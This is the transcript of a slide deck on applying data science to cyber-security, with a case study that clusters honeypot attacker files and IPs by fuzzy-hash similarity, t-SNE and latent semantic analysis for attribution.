Applications of Data Science in Cyber
-
Upload
richard-xie -
Category
Documents
-
view
126 -
download
0
Transcript of Applications of Data Science in Cyber
Applications of Data Science in Cyber-Security
Richard Xiehttps://linkedin.com/in/richardxyJanuary 2015
What is Cyber-Security?
• A.K.A– computer security, network security
• Secure network assets from intrusions and data breaches
• Assets include:– servers, work stations, mobile devices
• Layers to secure:– Firewall, operating systems, files, credentials,
etc.
Why It's Important?http://www.informationisbeautiful.net/visualizations/worlds-biggest-data-breaches-hacks/
Severe shortage of experts predicted
Cyber-Security + Data Science
Common Threats
• Exploitation of software volunerabilities• Fraud: spoofing, phishing, pharming • Malicious code (worms, viruses, spyware,
etc.)• dDos
How Data Science Would Help?
• Cyber-security is a big-data business– network logs– files– user-machine interactions– volume, velocity, variety, and veracity
• Data science is to be the engine to power next generation cyber-security solutions
Application Examples
• Spam email classification• Malware classification• Malicious IP classification• Intrusion detection• Network anomaly detection• Hacker attribution• and more...
A Real Case Study
• Hunting for Honeypot Attackers: A Data Scientist’s Adventure
• Honeynet is a set of honeypot systems deployed on internet
• Honeypot logs all hacking activities• Honeypot stores files uploaded by hackers• Malware used as hacker's weapons
Raw Statistics
• Data collection period– from March 2015 through the end of June
2015• >21k attacker IP address• 36 million SSH attempts• 34k unique usernames + 1 million
passwords being tried• 500 malicious domains and >1000 unique
malware being identified
Geo-location of Attacks
map_hacker_IP.py
Time Series of Attacks
time_series_activity.py
How raw data look like
Questions to Answer
• Clustering downloaded/crawled files to find file groups/categories
• attribution– association between attacks from different
days and IPs– where they came from
File Similarity Computation
• MD5 hash can't reflect slight changes in file
• Fuzzy hashing does• Using ssdeep, I computed pair-wise
similarity for all collected binary files and tar files
Steps to prepare data
• readRawData.py to create a collection "downloadsCollection"
• extract_crawled_file_to_mongo.py to create crawledFileCollection
• uniq_ip_count_MR.js to create uniqURLCollection
• uniq_ip_date_MR.js to create uniqURLDateCollection
• uniq_date_ip_MR.js to create uniqDateURLCollection
• uniq_hash_count_MR.js to create uniqFileCollection
• uniq_country_count_MR.js to create uniqCountryCollection
Graph of Files
two similar files have a connection, where similarity > 60% (for example)
identifySimilarDownloads.py from line 166
./graphiti demo graph_data/weighted_files2.json
Files -> Hacker
• a hacker may use same/similar tools on different days to hack systems
• File similarity matrix may provide hints on who were using those files
• treat date+IP as a unique attack, and all its associated binary files as its features
• construct a term matrix for all attacks
T-SNE on Attack-Malware Matrixwith K-Means Labeling
k=10
T-SNE: t-Distributed Stochastic Neighbor Embedding
get_similar_IPs.py from line 181
Latent Semantic Analysis
• LSA is widely used in NLP for topic finding• Analyzes relationships between a set of
documents and the terms they contain• Uses SVD to reduce number of
dimensions while maintaining record similarities
SVD: Singular Value Decomposition
Attacks Expressed with 1st and 2nd Principal Components
Each vector is a date+IP incident (a row in the term matrix)
Compute Similarities among Attacks• Similar attacks to a particular one: 2015-03-23%%61.160.212.21:5947 is similar to
2015-03-23%%118.193.241.192, similarity 0.958453 2015-03-23%%222.186.190.157:56789, similarity 0.996835 2015-03-24%%222.186.190.157:56789, similarity 0.961000 2015-03-25%%117.21.176.79:333, similarity 0.997087 2015-03-25%%222.186.190.157:56789, similarity 0.946751 2015-06-17%%222.186.30.175:56789, similarity 0.996835 2015-06-17%%61.160.247.42:1988, similarity 0.996835 2015-06-18%%222.186.30.175:56789, similarity 0.996835 2015-06-18%%61.160.247.42:1988, similarity 0.996835
Time Series of Attack Counts for Group 1
Time Series of Attack Counts for Group 2
Visualization of Attack Graph
./graphiti demo graph_data/weighted_IPs_95percent.json
We know where they were from
python_map_IP_latlon.py
So what?
• The analysis may leads to– near-real-time attribution (it's a new attack, or
something we saw before?)– near-real-time triage of new malware or a
variant of existing ones?– more...